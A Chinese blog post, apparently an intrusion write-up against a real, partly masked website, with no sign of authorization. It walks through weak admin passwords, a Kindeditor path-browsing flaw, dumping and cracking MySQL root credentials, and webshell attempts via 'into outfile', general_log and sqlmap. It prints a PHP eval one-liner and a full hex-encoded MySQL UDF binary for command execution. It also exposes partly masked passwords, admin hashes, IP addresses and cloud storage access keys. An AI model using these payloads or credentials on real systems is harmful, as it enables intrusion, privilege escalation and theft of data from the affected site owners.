91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

對某網站的一次掃描及滲 透測試

發布時間:2020-08-29 07:26:56 來源:網絡 閱讀:16927 作者:simeon2005 欄目:安全技術

1.1對某網站的一次滲 透

1.1.1后臺人弱口令登陸系統

1.登錄CMS后臺

   由于前期已經對目標網站進行過摸排,獲取了目標網站類似演示系統的測試賬號admin/123456,因此直接在目標網站http://c*****.t*****.com/m.php進行登錄,如圖1所示,成功登錄該CMS系統。該CMS網站帶有一定的安全意識,修改了admin.php為m.php,雖然admin.php頁面存在,但不發揮作用。

對某網站的一次掃描及滲 透測試

圖1 登錄CMS后臺

2.對后臺逐個功能進行分析和研究

   登錄后臺后對系統設置、文件上傳、數據備份、項目管理、訂單管理、會員管理、計劃任務、移動平臺等進行查看,分析該系統是自主開發還是采用公開模板開發。通過對該系統分析發現該系統是獨立開發,在互聯網上未有公開源代碼,無法對其進行源代碼審計。

1.1.2漏洞初步挖掘

1.文件上傳模塊分析

(1)系統所有上傳模塊都采用同一個上傳編輯器Kindeditor,經過實際測試,所有文件上傳的漏洞及相關方法失效。

(2)文件上傳模塊采用Kindeditor編輯器,通過尋找圖片或者文件上傳的地方,如圖2所示,選擇“網絡上的圖片”,然后單擊瀏覽即可對該CMS所在服務器上的上傳文件夾進行查看。 

對某網站的一次掃描及滲 透測試

圖2測試上傳模塊

(3)Kindeditor編輯器文件瀏覽漏洞

Kindeditor編輯器file_manager_json.php的path參數存在過濾不嚴格漏洞,可以通過修改該參數來瀏覽磁盤文件,早期版本Kindeditor編輯器不需要帶后續參數即可瀏覽目錄,新版本對漏洞進行修復過,但仍然存在漏洞,只是需要加上“&order=NAME&1546003143021”類似值,這個值是系統自動生成的。可以通過BurpSuite抓包獲取,如圖3所示。在權限限制不嚴格的情況下,可以通過修改path參數值對磁盤文件進行查看,原始的值path中無“/”,在BurpSuite中的Repeater中修改其值后,單擊“Go”提交,則可以在右邊窗口獲取文件列表等相關信息。

對某網站的一次掃描及滲 透測試

圖3測試文件目錄瀏覽漏洞

當然也可以在瀏覽器中訪問以下地址來獲取BurpSuite抓包提交一樣的效果:

http://c*****.t*****.com/admin/public/kindeditor/php/file_manager_json.php?path=&order=NAME&1546003143021。通過BurpSuite再次對path參數進行修改,但由于權限問題,如圖4所示,無法獲取上級目錄中的文件信息。

對某網站的一次掃描及滲 透測試

圖4無法獲取上級目錄文件信息

關鍵知識點:kindeditor/php/file_manager_json.php?path=&order=NAME&1546003143021

2.數據庫備份及還原

(1)可以對數據庫進行備份。但不知道數據備份文件的位置及其文件名稱。

(2)數據庫查詢。網站提供了直接對數據庫查詢接口,可以在其中輸入語句來進行查詢,http://c****.t*****.com/m.php?m=Database&a=sql&,通過執行MySQL相關命令來獲取獲取數據庫中用戶及密碼等信息,例如執行select * from mysql.user,如圖5所示,獲取數據庫用戶及密碼等有用信息,其中MySQL密碼可以直接在cmd5.com等網站進行破解。

對某網站的一次掃描及滲 透測試

圖5獲取數據庫用戶等信息

3.其它功能模塊測試

   由于在實際系統上,因此不能進行有可能導致系統崩潰及出現問題的測試。在實際系統未備份時執行危險操作可能導致數據庫等刪除后無法恢復。

1.1.3對服務器進行信息收集

1.服務器IP地址信息收集

(1)直接ping 域名,獲取IP地址為:1**.1**.3*.**4。

(2)網站https://www.yougetsignal.com/tools/web-sites-on-web-server/域名反查獲取IP地址。

2.對服務器IP地址進行端口掃描

   通過Nmap對該IP地址進行掃描,掃描結果顯示該IP開放21、22、80及3306端口。

3.分別對21、22及80端口進行測試

(1)21端口為Ftp端口,該服務存在Ftp服務器。

(2)對80端口進行訪問,也即直接IP地址訪問,如圖6所示,可以看出系統采用開源架構OneinStack安裝Web服務器,在頁面上可以查看本地環境信息,包括phpinfo、phpMyAdmin等信息。

對某網站的一次掃描及滲 透測試

圖6獲取Web服務器架構

(3)破解前面的MySQL密碼并登錄phpMyAdmin

在瀏覽器中打開http://1**.1**.3*.**4/phpMyAdmin/,輸入前面獲取的賬號和密碼root/w*****888,進行登錄,如圖7所示,成功獲取該MySQL數據庫Root權限。

對某網站的一次掃描及滲 透測試

圖7獲取數據庫管理權限

(4)對數據庫中各個庫的表信息進行整理,獲取真實物理地址信息如下:

/data/wwwroot/******ud.****s.cn/admin/public/robot/robot_0029.jpg

******ud.****s.cn/admin/public/robot/robot_0029.jpg

/data/wwwroot/www.s ******.com/admin/public/robot/robot_0026.jpg

/data/wwwroot/******ud.****s.cn/admin/public/robot/robot_0052.jpg

/data/wwwroot/ajg.t*****.com/admin/public/robot/robot_0596.jpg

(5)獲取數據庫對應網站地址

通過對數據庫中的表分析,獲取數據庫對應的網站URL信息,其中***shop數據庫對應網站a**.t*****.com,管理員密碼admin/dd****09。

1.1.4嘗試獲取webshell

   由于本次獲取的MySQL數據庫賬號是root賬號,按照過去的經驗應該很好獲取Webshell,但服務器環境為Linux,經過后續測試未能獲取Webshell,下面將其中用過的一些方法進行總結和分析。

1.讀取CMS系統文件內容

(1)在本地搭建環境測試讀取文件內容

在本地進行測試,select load_file('C:/ComsenzEXP/wwwroot/demo/index.php');如圖8所示,成功讀取index.php文件。

對某網站的一次掃描及滲 透測試

圖8讀取本地服務器文件

(2)對實際服務器進行測試。

由于目標服務器開通了3306端口,可以通過Navigate等MySQL客戶端工具進行連接,打開后執行命令:

select load_file('/data/wwwroot/******ud.****s.cn/index.php');

如圖9所示,實際結果顯示為NULL,無法讀取文件內容。

對某網站的一次掃描及滲 透測試

圖9對實際服務器讀取文件內容測試

2.寫入文件測試

(1)先在本地環境進行文件導出測試:

select '<?php eval($_POST[cmd]);?>' into outfile 'C:/ComsenzEXP/wwwroot/demo/eval.php';如圖10所示,執行成功,生成一句話后門,密碼為“cmd”;

對某網站的一次掃描及滲 透測試

圖10生成一句話后門

(2)實際服務器測試。根據前面的掌握的網站物理路徑情況,執行命令:

select '<?php eval($_POST[cmd]);?>' into outfile '/data/wwwroot/a**.t*****.com/admin/public/robot/eval.php';由于Linux權限問題無法寫入。

3.使用sqlmap直連MySQL方式方式來獲取cmd_shell

  執行MySQL直連獲取cmd_shell命令,雖然執行成功,但無法執行命令。

sqlmap.py -d "mysql://sroot:w*****888@1**.1**.3*.**4:3306/mysql" --os_shell

4.執行MySQL獲取Webshell的general_log方法

    配置general_log方法是MySQL數據庫禁止通過導出方式(secure-file-priv參數設置禁止導入導出)寫入Webshell的情況下,通過設置日志文件,然后執行查詢來獲取Webshell的方法。

(1)查看genera變量

show variables like '%general%';

(2)啟用general_log變量

set global general_log = on; 

(3)設置general_log記錄文件為shell文件

set global   general_log_file = '/data/wwwroot/www.*****.cn/abouts1.php';

(4)如果執行成功這執行cmd一句話查詢命令即可。

select '<?php eval($_POST[cmd]);?>' 

執行后,由于權限問題,無法直接獲取Webshell,如圖11所示。

對某網站的一次掃描及滲 透測試

圖11通過general_log方法獲取webshell失敗

6.linux下MySQL提權

show variables like '%plugin%';

select * from func; 

select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';

create function sys_eval returns string soname 'mysqludf.so';

select sys_eval('whoami');

select * from func;

  上面的方法等同于sqlmap直連數據進行提權,由于無法導入數據因此也無法提權。

1.1.5對另外一個同類目標的***

1.子域名信息收集

   通過subDomainsBrute(https://github.com/lijiejie/subDomainsBrute)在kali中搜索目標*****.cn的子域名信息:

./subDomainsBrute.py *****.cn

經過測試,獲取job.*****.cn、image.*****.cn、api.*****.cn后無其他子域名信息

2.主站***

(1)出錯信息獲取真實物理地址

/data/wwwroot/www.*****.cn/ThinkPHP/Library/Think/Dispatcher.class.php 

(2)www.*****.cn后臺弱口令

    主站CMS存在admin/admin弱口令,系統采用ThinkPHP架構開發,版本為3.2.3,雖然進入了后,也無法獲取Webshell

3.目標站點***

對目標站點通過******ud.****s.cn/m.php 后臺管理進行登錄,代理弱口令登錄后臺后,通過越權漏洞,成功獲取數據庫密碼。

(1)管理員帳號及密碼

admin 203972cad03302b4e83985004b159e66 61.156.121.192  w*****12

cadmin 2b2df28f20de4189ea1c4493f3e5e5bf  39.83.43.146  q*****14

(2)數據庫用戶及密碼

http://******ud.****s.cn/m.php?m=Database&a=sql&

select host,user,password from mysql.user ,如圖12所示,成功獲取該服務器密碼。

對某網站的一次掃描及滲 透測試

圖12獲取數據庫密碼

(3)通過客戶端工具成功連接數據庫

   通過客戶端連接工具直接連接數據庫,如圖13所示,可以對數據庫進行管理操作。

對某網站的一次掃描及滲 透測試

圖13連接MySQL數據庫進行管理

1.1.6oss服務器***

1.oss管理客戶端下載地址

(1)32位:http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-win32-ia32.zip?spm=a2c4g.11186623.2.8.5c735352ekAZYC&file=oss-browser-win32-ia32.zip

(2)64位:http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-win32-x64.zip?spm=a2c4g.11186623.2.9.5c735352cSK0r0&file=oss-browser-win32-x64.zip

(3)mac:http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-darwin-x64.zip?spm=a2c4g.11186623.2.10.5c735352ekAZYC&file=oss-browser-darwin-x64.zip

(4)linux 64:http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-linux-x64.zip?spm=a2c4g.11186623.2.11.5c735352ekAZYC&file=oss-browser-linux-x64.zip

2.通過數據庫中獲取了KeyID和keySecret信息

在數據庫中發現配置有連個OSS帳號相關信息:

(1)OSS帳號1詳細信息

{"keyId":"LTAI*****9O3cMjZ","keySecret":"INBUN3sOb*****9Nq2m5K4FtNEd","endpoint":"oss-cn-beijing.aliyuncs.com","bucket":"v*****9","id":"1"}

(2)OSS帳號2詳細信息

{"keyId":"LTA*****929oTEL","keySecret":"RA5hx*****9qkrf9UUmI63ZNDuu","id":"6"}

3.通過OSS客戶端進行連接并查看文件

(1)登錄OSS客戶端。將前面對應操作系統的OSS客戶端下載到本地,阿里云官方版本為1.7.4最新版本為1.8.1,運行oss-browser程序后,輸入AccesskeyId和AccessKeySecret進行登錄,如圖14所示。

對某網站的一次掃描及滲 透測試

圖14使用OSS客戶端進行登錄

(2)查看其OSS文件存儲文件

   如圖15所示,登錄起OSS文件存儲服務器后,該服務器主要存儲圖片文件,目標服務器CMS所有圖片及對應文件均上傳到OSS服務器上,選中對應的文件夾后可以將其下載到本地。

對某網站的一次掃描及滲 透測試

圖15圖片存儲信息

1.1.7防御及總結

1.多種技術交叉配合使用,技術難度不高

(1)在本案例中使用弱口令測試

(2)MySQL服務器文件讀取

(3)MySQL數據庫文件導出

(4)MySQL數據庫多個Webshell獲取方法測試

